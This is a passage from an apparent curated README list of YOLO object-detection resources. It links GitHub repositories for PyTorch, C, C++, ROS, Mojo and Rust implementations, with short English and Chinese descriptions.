ๆŽจ็†ๅบ“๏ผŒๆ”ฏๆŒllama ใ€Unetใ€Yolov5ใ€Resnet็ญ‰ๆจกๅž‹็š„ๆŽจ็†ใ€‚Implement a high-performance deep learning inference library step by step. - [kuiperdatawhale](https://github.com/zjhellofss/kuiperdatawhale) <img src="https://img.shields.io/github/stars/zjhellofss/kuiperdatawhale?style=social"/> : ไปŽ้›ถ่‡ชๅˆถๆทฑๅบฆๅญฆไน ๆŽจ็†ๆก†ๆžถใ€‚ - [roboflow/notebooks](https://github.com/roboflow/notebooks) <img src="https://img.shields.io/github/stars/roboflow/notebooks?style=social"/> : Examples and tutorials on using SOTA computer vision models and techniques. Learn everything from old-school ResNet, through YOLO and object-detection transformers like DETR, to the latest models like Grounding DINO and SAM. [roboflow.com/models](https://roboflow.com/models) - [yjh0410/PyTorch_YOLO_Tutorial](https://github.com/yjh0410/PyTorch_YOLO_Tutorial) <img src="https://img.shields.io/github/stars/yjh0410/PyTorch_YOLO_Tutorial?style=social"/> : YOLO Tutorial. - [HuKai97/yolov5-5.x-annotations](https://github.com/HuKai97/yolov5-5.x-annotations) <img src="https://img.shields.io/github/stars/HuKai97/yolov5-5.x-annotations?style=social"/> : ไธ€ไธชๅŸบไบŽyolov5-5.0็š„ไธญๆ–‡ๆณจ้‡Š็‰ˆๆœฌ๏ผ - [crkk-feng/yolov5-annotations](https://github.com/crkk-feng/yolov5-annotations) <img src="https://img.shields.io/github/stars/crkk-feng/yolov5-annotations?style=social"/> : A Chinese annotated version of yolov5-5.0. - [XiaoJiNu/yolov5-v6-chinese-comment](https://github.com/XiaoJiNu/yolov5-v6-chinese-comment) <img src="https://img.shields.io/github/stars/XiaoJiNu/yolov5-v6-chinese-comment?style=social"/> : yolov5-v6็‰ˆๆœฌๆณจ้‡Šใ€‚ - [1131624548/About-YOLOv5-7-0](https://github.com/1131624548/About-YOLOv5-7-0) <img src="https://img.shields.io/github/stars/XiaoJiNu/yolov5-v6-chinese-comment?style=social"/> : YOLOv5ไปฃ็ ๆณจ้‡Šใ€‚ - [zyds/yolov5-code](https://github.com/zyds/yolov5-code) <img src="https://img.shields.io/github/stars/zyds/yolov5-code?style=social"/> : ๆ‰‹ๆŠŠๆ‰‹ๅธฆไฝ ๅฎžๆˆ˜ YOLOv5ใ€‚ ## Extensional Frameworks - [EasyCV](https://github.com/alibaba/EasyCV) <img src="https://img.shields.io/github/stars/alibaba/EasyCV?style=social"/> : An all-in-one toolkit for computer vision. "YOLOX-PAI: An Improved YOLOX, Stronger and Faster than YOLOv6". (**[arXiv 2022](https://arxiv.org/abs/2208.13040)**). "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ้›†ๆ™บไนฆ็ซฅใ€ใ€Š[YOLOXๅ‡็บง | ้˜ฟ้‡Œๅทดๅทดๆๅ‡บYOLOX-PAI๏ผŒ1msๅ†…็ฒพๅบฆๆ— ๆ•Œ๏ผŒ่ถ…่ถŠYOLOv6ใ€PP-YOLOE](https://mp.weixin.qq.com/s/bIu3cYyZ-fVb5iB0bTfyug)ใ€‹" - [YOLACT & YOLACT++](https://github.com/dbolya/yolact) <img src="https://img.shields.io/github/stars/dbolya/yolact?style=social"/> : You Only Look At CoefficienTs. (**[ICCV 2019](https://openaccess.thecvf.com/content_ICCV_2019/html/Bolya_YOLACT_Real-Time_Instance_Segmentation_ICCV_2019_paper.html), [IEEE TPAMI 2020](https://ieeexplore.ieee.org/abstract/document/9159935)**) - [Alpha-IoU](https://github.com/Jacobi93/Alpha-IoU) <img src="https://img.shields.io/github/stars/Jacobi93/Alpha-IoU?style=social"/> : "Alpha-IoU: A Family of Power Intersection over Union Losses for Bounding Box Regression". (**[NeurIPS 2021](https://proceedings.neurips.cc//paper/2021/hash/a8f15eda80c50adb0e71943adc8015cf-Abstract.html)**) - [CIoU](https://github.com/Zzh-tju/CIoU) <img src="https://img.shields.io/github/stars/Zzh-tju/CIoU?style=social"/> : Complete-IoU (CIoU) Loss and Cluster-NMS for Object Detection and Instance Segmentation (YOLACT). (**[AAAI 2020](https://ojs.aaai.org/index.php/AAAI/article/view/6999), [IEEE TCYB 2021](https://ieeexplore.ieee.org/abstract/document/9523600)**) - [Albumentations](https://github.com/albumentations-team/albumentations) <img src="https://img.shields.io/github/stars/albumentations-team/albumentations?style=social"/> : Albumentations is a Python library for image augmentation. Image augmentation is used in deep learning and computer vision tasks to increase the quality of trained models. The purpose of image augmentation is to create new training samples from the existing data. "Albumentations: Fast and Flexible Image Augmentations". (**[Information 2020](https://www.mdpi.com/2078-2489/11/2/125)**) - [doubleZ0108/Data-Augmentation](https://github.com/doubleZ0108/Data-Augmentation) <img src="https://img.shields.io/github/stars/doubleZ0108/Data-Augmentation?style=social"/> : General Data Augmentation Algorithms for Object Detection(esp. Yolo). ## Other Versions of YOLO - ### PyTorch Implementation - [ultralytics/yolov3](https://github.com/ultralytics/yolov3) <img src="https://img.shields.io/github/stars/ultralytics/yolov3?style=social"/> : YOLOv3 in PyTorch > ONNX > CoreML > TFLite. - [eriklindernoren/PyTorch-YOLOv3](https://github.com/eriklindernoren/PyTorch-YOLOv3) <img src="https://img.shields.io/github/stars/eriklindernoren/PyTorch-YOLOv3?style=social"/> : Minimal PyTorch implementation of YOLOv3. - [Tianxiaomo/pytorch-YOLOv4](https://github.com/Tianxiaomo/pytorch-YOLOv4) <img src="https://img.shields.io/github/stars/Tianxiaomo/pytorch-YOLOv4?style=social"/> : PyTorch ,ONNX and TensorRT implementation of YOLOv4. - [ayooshkathuria/pytorch-yolo-v3](https://github.com/ayooshkathuria/pytorch-yolo-v3) <img src="https://img.shields.io/github/stars/ayooshkathuria/pytorch-yolo-v3?style=social"/> : A PyTorch implementation of the YOLO v3 object detection algorithm. - [WongKinYiu/PyTorch_YOLOv4](https://github.com/WongKinYiu/PyTorch_YOLOv4) <img src="https://img.shields.io/github/stars/WongKinYiu/PyTorch_YOLOv4?style=social"/> : PyTorch implementation of YOLOv4. - [argusswift/YOLOv4-pytorch](https://github.com/argusswift/YOLOv4-pytorch) <img src="https://img.shields.io/github/stars/argusswift/YOLOv4-pytorch?style=social"/> : This is a pytorch repository of YOLOv4, attentive YOLOv4 and mobilenet YOLOv4 with PASCAL VOC and COCO. - [longcw/yolo2-pytorch](https://github.com/longcw/yolo2-pytorch) <img src="https://img.shields.io/github/stars/longcw/yolo2-pytorch?style=social"/> : YOLOv2 in PyTorch. - [bubbliiiing/yolov5-v6.1-pytorch](https://github.com/bubbliiiing/yolov5-v6.1-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov5-v6.1-pytorch?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชyolov5-v6.1-pytorch็š„ๆบ็ ๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆจกๅž‹ใ€‚ - [bubbliiiing/yolov5-pytorch](https://github.com/bubbliiiing/yolov5-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov5-pytorch?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชYoloV5-pytorch็š„ๆบ็ ๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆจกๅž‹ใ€‚ - [bubbliiiing/yolov4-pytorch](https://github.com/bubbliiiing/yolov4-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov4-pytorch?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชYoloV4-pytorch็š„ๆบ็ ๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆจกๅž‹ใ€‚ - [bubbliiiing/yolov4-tiny-pytorch](https://github.com/bubbliiiing/yolov4-tiny-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov4-tiny-pytorch?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชYoloV4-tiny-pytorch็š„ๆบ็ ๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆจกๅž‹ใ€‚ - [bubbliiiing/yolov3-pytorch](https://github.com/bubbliiiing/yolo3-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolo3-pytorch?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชyolo3-pytorch็š„ๆบ็ ๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆจกๅž‹ใ€‚ - [bubbliiiing/yolox-pytorch](https://github.com/bubbliiiing/yolox-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolox-pytorch?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชyolox-pytorch็š„ๆบ็ ๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆจกๅž‹ใ€‚ - [bubbliiiing/yolov7-pytorch](https://github.com/bubbliiiing/yolov7-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov7-pytorch?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชyolov7็š„ๅบ“๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†ใ€‚ - [bubbliiiing/yolov8-pytorch](https://github.com/bubbliiiing/yolov8-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/yolov8-pytorch?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชyolov8-pytorch็š„ไป“ๅบ“๏ผŒๅฏไปฅ็”จไบŽ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†ใ€‚ - [BobLiu20/YOLOv3_PyTorch](https://github.com/BobLiu20/YOLOv3_PyTorch) <img src="https://img.shields.io/github/stars/BobLiu20/YOLOv3_PyTorch?style=social"/> : Full implementation of YOLOv3 in PyTorch. - [ruiminshen/yolo2-pytorch](https://github.com/ruiminshen/yolo2-pytorch) <img src="https://img.shields.io/github/stars/ruiminshen/yolo2-pytorch?style=social"/> : PyTorch implementation of the YOLO (You Only Look Once) v2. - [DeNA/PyTorch_YOLOv3](https://github.com/DeNA/PyTorch_YOLOv3) <img src="https://img.shields.io/github/stars/DeNA/PyTorch_YOLOv3?style=social"/> : Implementation of YOLOv3 in PyTorch. - [abeardear/pytorch-YOLO-v1](https://github.com/abeardear/pytorch-YOLO-v1) <img src="https://img.shields.io/github/stars/abeardear/pytorch-YOLO-v1?style=social"/> : an experiment for yolo-v1, including training and testing. - [wuzhihao7788/yolodet-pytorch](https://github.com/wuzhihao7788/yolodet-pytorch) <img src="https://img.shields.io/github/stars/wuzhihao7788/yolodet-pytorch?style=social"/> : reproduce the YOLO series of papers in pytorch, including YOLOv4, PP-YOLO, YOLOv5๏ผŒYOLOv3, etc. - [uvipen/Yolo-v2-pytorch](https://github.com/uvipen/Yolo-v2-pytorch) <img src="https://img.shields.io/github/stars/uvipen/Yolo-v2-pytorch?style=social"/> : YOLO for object detection tasks. - [Peterisfar/YOLOV3](https://github.com/Peterisfar/YOLOV3) <img src="https://img.shields.io/github/stars/Peterisfar/YOLOV3?style=social"/> : yolov3 by pytorch. - [misads/easy_detection](https://github.com/misads/easy_detection) <img src="https://img.shields.io/github/stars/misads/easy_detection?style=social"/> : ไธ€ไธช็ฎ€ๅ•ๆ–นไพฟ็š„็›ฎๆ ‡ๆฃ€ๆต‹ๆก†ๆžถ(PyTorch็Žฏๅขƒๅฏ็›ดๆŽฅ่ฟ่กŒ๏ผŒไธ้œ€่ฆcuda็ผ–่ฏ‘)๏ผŒๆ”ฏๆŒFaster_RCNNใ€Yolo็ณปๅˆ—(v2~v5)ใ€EfficientDetใ€RetinaNetใ€Cascade-RCNN็ญ‰็ปๅ…ธ็ฝ‘็ปœใ€‚ - [miemiedetection](https://github.com/miemie2013/miemiedetection) <img src="https://img.shields.io/github/stars/miemie2013/miemiedetection?style=social"/> : Pytorch and ncnn implementation of PPYOLOEใ€YOLOXใ€PPYOLOใ€PPYOLOv2ใ€SOLOv2 an so on. - [pjh5672/YOLOv1](https://github.com/pjh5672/YOLOv1) <img src="https://img.shields.io/github/stars/pjh5672/YOLOv1?style=social"/> : YOLOv1 implementation using PyTorch. - [pjh5672/YOLOv2](https://github.com/pjh5672/YOLOv2) <img src="https://img.shields.io/github/stars/pjh5672/YOLOv2?style=social"/> : YOLOv2 implementation using PyTorch. - [pjh5672/YOLOv3](https://github.com/pjh5672/YOLOv3) <img src="https://img.shields.io/github/stars/pjh5672/YOLOv3?style=social"/> : YOLOv3 implementation using PyTorch. - [Iywie/pl_YOLO](https://github.com/Iywie/pl_YOLO) <img src="https://img.shields.io/github/stars/Iywie/pl_YOLO?style=social"/> : YOLOv7, YOLOX and YOLOv5 are working right now. - [DavidLandup0/deepvision](https://github.com/DavidLandup0/deepvision) <img src="https://img.shields.io/github/stars/DavidLandup0/deepvision?style=social"/> : PyTorch and TensorFlow/Keras image models with automatic weight conversions and equal API/implementations - Vision Transformer (ViT), ResNetV2, EfficientNetV2, (planned...) DeepLabV3+, ConvNeXtV2, YOLO, NeRF, etc. - [theos-ai/easy-yolov7](https://github.com/theos-ai/easy-yolov7) <img src="https://img.shields.io/github/stars/theos-ai/easy-yolov7?style=social"/> : This a clean and easy-to-use implementation of YOLOv7 in PyTorch, made with โค๏ธ by Theos AI. - ### C Implementation - [ggml](https://github.com/ggerganov/ggml) <img src="https://img.shields.io/github/stars/ggerganov/ggml?style=social"/> : Tensor library for machine learning. Written in C. - [rockcarry/ffcnn](https://github.com/rockcarry/ffcnn) <img src="https://img.shields.io/github/stars/rockcarry/ffcnn?style=social"/> : ffcnn is a cnn neural network inference framework, written in 600 lines C language. - [ar7775/Object-Detection-System-Yolo](https://github.com/ar7775/Object-Detection-System-Yolo) <img src="https://img.shields.io/github/stars/ar7775/Object-Detection-System-Yolo?style=social"/> : Object Detection System. - [lstuma/YOLO_utils](https://github.com/lstuma/YOLO_utils) <img src="https://img.shields.io/github/stars/lstuma/YOLO_utils?style=social"/> : A few utilities for the YOLO project implemented in C for extra speed. - [RajneeshKumar12/yolo-detection-app](https://github.com/RajneeshKumar12/yolo-detection-app) <img src="https://img.shields.io/github/stars/RajneeshKumar12/yolo-detection-app?style=social"/> : Yolo app for object detection. - [Deyht/CIANNA](https://github.com/Deyht/CIANNA) <img src="https://img.shields.io/github/stars/Deyht/CIANNA?style=social"/> : CIANNA - Convolutional Interactive Artificial Neural Networks by/for Astrophysicists. - ### CPP Implementation - [walktree/libtorch-yolov3](https://github.com/walktree/libtorch-yolov3) <img src="https://img.shields.io/github/stars/walktree/libtorch-yolov3?style=social"/> : A Libtorch implementation of the YOLO v3 object detection algorithm, written with pure C++. - [yasenh/libtorch-yolov5](https://github.com/yasenh/libtorch-yolov5) <img src="https://img.shields.io/github/stars/yasenh/libtorch-yolov5?style=social"/> : A LibTorch inference implementation of the yolov5. - [Nebula4869/YOLOv5-LibTorch](https://github.com/Nebula4869/YOLOv5-LibTorch) <img src="https://img.shields.io/github/stars/Nebula4869/YOLOv5-LibTorch?style=social"/> : Real time object detection with deployment of YOLOv5 through LibTorch C++ API. - [ncdhz/YoloV5-LibTorch](https://github.com/ncdhz/YoloV5-LibTorch) <img src="https://img.shields.io/github/stars/ncdhz/YoloV5-LibTorch?style=social"/> : ไธ€ไธช C++ ็‰ˆๆœฌ็š„ YoloV5 ๅฐ่ฃ…ๅบ“. - [Rane2021/yolov5_train_cpp_inference](https://github.com/Rane2021/yolov5_train_cpp_inference) <img src="https://img.shields.io/github/stars/Rane2021/yolov5_train_cpp_inference?style=social"/> : yolov5่ฎญ็ปƒๅ’Œc++ๆŽจ็†ไปฃ็ ๏ผŒๆ•ˆๆžœๅ‡บ่‰ฒใ€‚ - [stephanecharette/DarkHelp](https://github.com/stephanecharette/DarkHelp) <img src="https://img.shields.io/github/stars/stephanecharette/DarkHelp?style=social"/> : The DarkHelp C++ API is a wrapper to make it easier to use the Darknet neural network framework within a C++ application. - [UNeedCryDear/yolov5-opencv-dnn-cpp](https://github.com/UNeedCryDear/yolov5-opencv-dnn-cpp) <img src="https://img.shields.io/github/stars/UNeedCryDear/yolov5-opencv-dnn-cpp?style=social"/> : ไฝฟ็”จopencvๆจกๅ—้ƒจ็ฝฒyolov5-6.0็‰ˆๆœฌใ€‚ - [UNeedCryDear/yolov5-seg-opencv-onnxruntime-cpp](https://github.com/UNeedCryDear/yolov5-seg-opencv-onnxruntime-cpp) <img src="https://img.shields.io/github/stars/UNeedCryDear/yolov5-seg-opencv-onnxruntime-cpp?style=social"/> : yolov5 segmentation with onnxruntime and opencv. - [hpc203/yolov5-dnn-cpp-python](https://github.com/hpc203/yolov5-dnn-cpp-python) <img src="https://img.shields.io/github/stars/hpc203/yolov5-dnn-cpp-python?style=social"/> : ็”จopencv็š„dnnๆจกๅ—ๅšyolov5็›ฎๆ ‡ๆฃ€ๆต‹๏ผŒๅŒ…ๅซC++ๅ’ŒPythonไธคไธช็‰ˆๆœฌ็š„็จ‹ๅบใ€‚ - [hpc203/yolox-opencv-dnn](https://github.com/hpc203/yolox-opencv-dnn) <img src="https://img.shields.io/github/stars/hpc203/yolox-opencv-dnn?style=social"/> : ไฝฟ็”จOpenCV้ƒจ็ฝฒYOLOX๏ผŒๆ”ฏๆŒYOLOX-Sใ€YOLOX-Mใ€YOLOX-Lใ€YOLOX-Xใ€YOLOX-Darknet53ไบ”็ง็ป“ๆž„๏ผŒๅŒ…ๅซC++ๅ’ŒPythonไธค็ง็‰ˆๆœฌ็š„็จ‹ๅบใ€‚ - [hpc203/yolov7-opencv-onnxrun-cpp-py](https://github.com/hpc203/yolov7-opencv-onnxrun-cpp-py) <img src="https://img.shields.io/github/stars/hpc203/yolov7-opencv-onnxrun-cpp-py?style=social"/> : ๅˆ†ๅˆซไฝฟ็”จOpenCVใ€ONNXRuntime้ƒจ็ฝฒYOLOV7็›ฎๆ ‡ๆฃ€ๆต‹๏ผŒไธ€ๅ…ฑๅŒ…ๅซ12ไธชonnxๆจกๅž‹๏ผŒไพ็„ถๆ˜ฏๅŒ…ๅซC++ๅ’ŒPythonไธคไธช็‰ˆๆœฌ็š„็จ‹ๅบใ€‚ - [doleron/yolov5-opencv-cpp-python](https://github.com/doleron/yolov5-opencv-cpp-python) <img src="https://img.shields.io/github/stars/doleron/yolov5-opencv-cpp-python?style=social"/> : Example of using ultralytics YOLO V5 with OpenCV 4.5.4, C++ and Python. - [UNeedCryDear/yolov8-opencv-onnxruntime-cpp](https://github.com/UNeedCryDear/yolov8-opencv-onnxruntime-cpp) <img src="https://img.shields.io/github/stars/UNeedCryDear/yolov8-opencv-onnxruntime-cpp?style=social"/> : detection and instance segmentation of yolov8,use onnxruntime and opencv. - ### ROS Implementation - [mgonzs13/yolov8_ros](https://github.com/mgonzs13/yolov8_ros) <img src="https://img.shields.io/github/stars/mgonzs13/yolov8_ros?style=social"/> : Ultralytics YOLOv8 and YOLOv9 object detections for ROS 2. - [leggedrobotics/darknet_ros](https://github.com/leggedrobotics/darknet_ros) <img src="https://img.shields.io/github/stars/leggedrobotics/darknet_ros?style=social"/> : Real-Time Object Detection for ROS. - [engcang/ros-yolo-sort](https://github.com/engcang/ros-yolo-sort) <img src="https://img.shields.io/github/stars/engcang/ros-yolo-sort?style=social"/> : YOLO and SORT, and ROS versions of them. - [chrisgundling/YoloLight](https://github.com/chrisgundling/YoloLight) <img src="https://img.shields.io/github/stars/chrisgundling/YoloLight?style=social"/> : Tiny-YOLO-v2 ROS Node for Traffic Light Detection. - [Ar-Ray-code/YOLOX-ROS](https://github.com/Ar-Ray-code/YOLOX-ROS) <img src="https://img.shields.io/github/stars/Ar-Ray-code/YOLOX-ROS?style=social"/> : YOLOX + ROS2 object detection package. - [Ar-Ray-code/YOLOv5-ROS](https://github.com/Ar-Ray-code/YOLOv5-ROS) <img src="https://img.shields.io/github/stars/Ar-Ray-code/YOLOv5-ROS?style=social"/> : YOLOv5 + ROS2 object detection package. - [Tossy0423/yolov4-for-darknet_ros](https://github.com/Tossy0423/yolov4-for-darknet_ros) <img src="https://img.shields.io/github/stars/Tossy0423/yolov4-for-darknet_ros?style=social"/> : This is the environment in which YOLO V4 is ported to darknet_ros. - [qianmin/yolov5_ROS](https://github.com/qianmin/yolov5_ROS) <img src="https://img.shields.io/github/stars/qianmin/yolov5_ROS?style=social"/> : run YOLOv5 in ROS๏ผŒROSไฝฟ็”จYOLOv5ใ€‚ - [ailllist/yolov5_ROS](https://github.com/ailllist/yolov5_ROS) <img src="https://img.shields.io/github/stars/ailllist/yolov5_ROS?style=social"/> : yolov5 for ros, not webcam. - [Shua-Kang/ros_pytorch_yolov5](https://github.com/Shua-Kang/ros_pytorch_yolov5) <img src="https://img.shields.io/github/stars/Shua-Kang/ros_pytorch_yolov5?style=social"/> : A ROS wrapper for yolov5. (master branch is v5.0 of yolov5; for v6.1, see branch v6.1). - [ziyan0302/Yolov5_DeepSort_Pytorch_ros](https://github.com/ziyan0302/Yolov5_DeepSort_Pytorch_ros) <img src="https://img.shields.io/github/stars/ziyan0302/Yolov5_DeepSort_Pytorch_ros?style=social"/> : Connect Yolov5 detection module and DeepSort tracking module via ROS. - [U07157135/ROS2-with-YOLOv5](https://github.com/U07157135/ROS2-with-YOLOv5) <img src="https://img.shields.io/github/stars/U07157135/ROS2-with-YOLOv5?style=social"/> : ๅœจ็„กไบบๆฉŸไธŠไปฅROS2ๆŠ€่ก“ๅฏฆ็พYOLOv5็‰ฉไปถๅตๆธฌใ€‚ - [lukazso/yolov6-ros](https://github.com/lukazso/yolov6-ros) <img src="https://img.shields.io/github/stars/lukazso/yolov6-ros?style=social"/> : ROS package for YOLOv6. - [qq44642754a/Yolov5_ros](https://github.com/qq44642754a/Yolov5_ros) <img src="https://img.shields.io/github/stars/qq44642754a/Yolov5_ros?style=social"/> : Real-time object detection with ROS, based on YOLOv5 and PyTorch (ๅŸบไบŽ YOLOv5็š„ROSๅฎžๆ—ถๅฏน่ฑกๆฃ€ๆต‹). - [lukazso/yolov7-ros](https://github.com/lukazso/yolov7-ros) <img src="https://img.shields.io/github/stars/lukazso/yolov7-ros?style=social"/> : ROS package for official YOLOv7. - [phuoc101/yolov7_ros](https://github.com/phuoc101/yolov7_ros) <img src="https://img.shields.io/github/stars/phuoc101/yolov7_ros?style=social"/> : ROS package for official YOLOv7. - [ConfusionTechnologies/ros-yolov5-node](https://github.com/ConfusionTechnologies/ros-yolov5-node) <img src="https://img.shields.io/github/stars/ConfusionTechnologies/ros-yolov5-node?style=social"/> : For ROS2, uses ONNX GPU Runtime to inference YOLOv5. - [Ar-Ray-code/darknet_ros_fp16](https://github.com/Ar-Ray-code/darknet_ros_fp16) <img src="https://img.shields.io/github/stars/Ar-Ray-code/darknet_ros_fp16?style=social"/> : darknet + ROS2 Humble + OpenCV4 + CUDA 11๏ผˆcuDNN, Jetson Orin๏ผ‰. - [wk123467/yolov5s_trt_ros](https://github.com/wk123467/yolov5s_trt_ros) <img src="https://img.shields.io/github/stars/wk123467/yolov5s_trt_ros?style=social"/> : ๅˆฉ็”จTensorRTๅฏนyolov5s่ฟ›่กŒๅŠ ้€Ÿ๏ผŒๅนถๅฐ†ๅ…ถๅบ”็”จไบŽROS๏ผŒๅฎž็Žฐไบค้€šๆ ‡ๅฟ—ใ€็บข็ปฟ็ฏ(็›ดๆŽฅ่พ“ๅ‡บ่ทฏ็ฏ็Šถๆ€)ใ€่กŒไบบๅ’Œ่ฝฆ่พ†็ญ‰ไบค้€šๅœบๆ™ฏ็š„ๆฃ€ๆต‹ใ€‚ - [PardisTaghavi/yolov7_strongsort_ros](https://github.com/PardisTaghavi/yolov7_strongsort_ros) <img src="https://img.shields.io/github/stars/PardisTaghavi/yolov7_strongsort_ros?style=social"/> : Integration of "Yolov7 StrongSort" with ROS for real time object tracking. - [af-doom/yolov8_ros_tensorrt-](https://github.com/af-doom/yolov8_ros_tensorrt-) <img src="https://img.shields.io/github/stars/af-doom/yolov8_ros_tensorrt-?style=social"/> : This is a YOLOv8 project based on ROS implementation, where YOLOv8 uses Tensorrt acceleration. - [KoKoMier/ros_darknet_yolov4](https://github.com/KoKoMier/ros_darknet_yolov4) <img src="https://img.shields.io/github/stars/KoKoMier/ros_darknet_yolov4?style=social"/> : ่ฟ™ๆ˜ฏๆœบๅ™จไบบๅฐ็ป„่ง†่ง‰ไธŽ้›ท่พพ็š„็ป“ๅˆ็จ‹ๅบ๏ผŒ้ฆ–ๅ…ˆ้€š่ฟ‡yolo็›ฎๆ ‡ๆฃ€ๆต‹่ฏ†ๅˆซๅˆฐ็‰ฉไฝ“๏ผŒ็„ถๅŽๆŠŠ่ฏ†ๅˆซๅˆฐ็š„ๆ•ฐๆฎๅ‘้€็ป™ros้‡Œ้ข็จ‹ๅบ๏ผŒ็”จไบŽ้›ท่พพๆ•ฐๆฎ็ป“ๅˆใ€‚ - [YellowAndGreen/Yolov5-OpenCV-Cpp-Python-ROS](https://github.com/YellowAndGreen/Yolov5-OpenCV-Cpp-Python-ROS) <img src="https://img.shields.io/github/stars/YellowAndGreen/Yolov5-OpenCV-Cpp-Python-ROS?style=social"/> : Inference with YOLOv5, OpenCV 4.5.4 DNN, C++, ROS and Python. - [mgonzs13/yolov8_ros](https://github.com/mgonzs13/yolov8_ros) <img src="https://img.shields.io/github/stars/mgonzs13/yolov8_ros?style=social"/> : ROS 2 wrap for Ultralytics [YOLOv8](https://github.com/ultralytics/ultralytics) to perform object detection. - [fishros/yolov5_ros2](https://github.com/fishros/yolov5_ros2) <img src="https://img.shields.io/github/stars/fishros/yolov5_ros2?style=social"/> : ๅŸบไบŽYoloV5็š„ROS2ๅŠŸ่ƒฝๅŒ…๏ผŒๅฏไปฅๅฟซ้€ŸๅฎŒๆˆ็‰ฉไฝ“่ฏ†ๅˆซไธŽไฝๅงฟๅ‘ๅธƒใ€‚ - [fateshelled/EdgeYOLO-ROS](https://github.com/fateshelled/EdgeYOLO-ROS) <img src="https://img.shields.io/github/stars/fateshelled/EdgeYOLO-ROS?style=social"/> : EdgeYOLO + ROS2 object detection package. - [vivaldini/yolov6-uav](https://github.com/vivaldini/yolov6-uav) <img src="https://img.shields.io/github/stars/vivaldini/yolov6-uav?style=social"/> : This repository contains a ROS noetic package for YOLOv6 to recognize objects from UAV and provide their positions. - [Alpaca-zip/ultralytics_ros](https://github.com/Alpaca-zip/ultralytics_ros) <img src="https://img.shields.io/github/stars/Alpaca-zip/ultralytics_ros?style=social"/> : ROS/ROS2 package for Ultralytics YOLOv8 real-time object detection. - ### Mojo Implementation - [taalhaataahir0102/Mojo-Yolo](https://github.com/taalhaataahir0102/Mojo-Yolo) <img src="https://img.shields.io/github/stars/taalhaataahir0102/Mojo-Yolo?style=social"/> : Mojo-Yolo. - ### Rust Implementation - [Candle](https://github.com/huggingface/candle) <img src="https://img.shields.io/github/stars/huggingface/candle?style=social"/> : Minimalist ML framework for Rust. - [Tokenizers](https://github.com/huggingface/tokenizers) <img src="https://img.shields.io/github/stars/huggingface/tokenizers?style=social"/> : ๐Ÿ’ฅ Fast State-of-the-Art Tokenizers optimized for Research and Production. [huggingface.co/docs/tokenizers](https://huggingface.co/docs/tokenizers/index) - [Safetensors](https://github.com/huggingface/safetensors) <img src="https://img.shields.io/github/stars/huggingface/safetensors?style=social"/> : Simple, safe way to store and distribute tensors. [huggingface.co/docs/safetensors](https://huggingface.co/docs/safetensors/index) - [Burn](https://github.com/burn-rs/burn) <img src="https://img.shields.io/github/stars/burn-rs/burn?style=social"/> : Burn - A Flexible and Comprehensive Deep Learning Framework in Rust. [burn-rs.github.io/](https://burn-rs.github.io/) - [TensorFlow Rust](https://github.com/tensorflow/rust) <img src="https://img.shields.io/github/stars/tensorflow/rust?style=social"/> : Rust language bindings for TensorFlow. - [tch-rs](https://github.com/LaurentMazare/tch-rs) <img src="https://img.shields.io/github/stars/LaurentMazare/tch-rs?style=social"/> : Rust bindings for the C++ api of PyTorch. - [dfdx](https://github.com/coreylowman/dfdx) <img src="https://img.shields.io/github/stars/coreylowman/dfdx?style=social"/> : Deep learning in Rust, with shape checked tensors and neural networks. - [tract](https://github.com/sonos/tract) <img src="https://img.shields.io/github/stars/sonos/tract?style=social"/> : Sonos' Neural Network inference engine. Tiny, no-nonsense, self-contained, Tensorflow and ONNX inference - [ort](https://github.com/pykeio/ort) <img src="https://img.shields.io/github/stars/pykeio/ort?style=social"/> : A Rust wrapper for ONNX Runtime. [docs.rs/ort](https://docs.rs/ort/latest/ort/) - [codingonion/yolov5-gui-slint](https://github.com/codingonion/yolov5-gui-slint) <img src="https://img.shields.io/github/stars/codingonion/yolov5-gui-slint?style=social"/> : YOLOv5 GUI inference framework built with Slint. - [ptaxom/pnn](https://github.com/ptaxom/pnn) <img src="https://img.shields.io/github/stars/ptaxom/pnn?style=social"/> : pnn is [Darknet](https://github.com/alexeyAB/darknet) compatible neural nets inference engine implemented in Rust. By optimizing was achieved significant performance increment(especially in FP16 mode). pnn provide CUDNN-based and TensorRT-based inference engines. - [bencevans/rust-opencv-yolov5](https://github.com/bencevans/rust-opencv-yolov5) <img src="https://img.shields.io/github/stars/bencevans/rust-opencv-yolov5?style=social"/> : YOLOv5 Inference with ONNX & OpenCV in Rust. - [masc-it/yolov5-api-rust](https://github.com/masc-it/yolov5-api-rust) <img src="https://img.shields.io/github/stars/masc-it/yolov5-api-rust?style=social"/> : Rust API to run predictions with YoloV5 models. - [AndreyGermanov/yolov8_onnx_rust](https://github.com/AndreyGermanov/yolov8_onnx_rust) <img src="https://img.shields.io/github/stars/AndreyGermanov/yolov8_onnx_rust?style=social"/> : YOLOv8 inference using Rust. - 